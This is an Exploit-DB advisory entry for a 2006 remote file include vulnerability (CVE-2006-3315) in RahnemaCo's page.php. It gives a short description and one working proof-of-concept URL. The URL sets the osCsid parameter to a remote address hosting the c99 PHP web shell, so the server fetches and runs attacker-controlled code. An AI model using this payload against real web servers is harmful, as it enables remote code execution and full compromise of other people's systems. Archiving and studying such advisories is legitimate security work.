RahnemaCo Page.PHP Remote File Include Vulnerability

2006-06-14T00:00:00
ID EDB-ID:28025
Type exploitdb
Reporter Breeeeh
Modified 2006-06-14T00:00:00

Description

RahnemaCo Page.PHP Remote File Include Vulnerability. CVE-2006-3315. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/18435/info

RahnemaCo is prone to a remote file-include vulnerability.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/shop/page.php?osCsid=http://yoursite/c99shell.txt?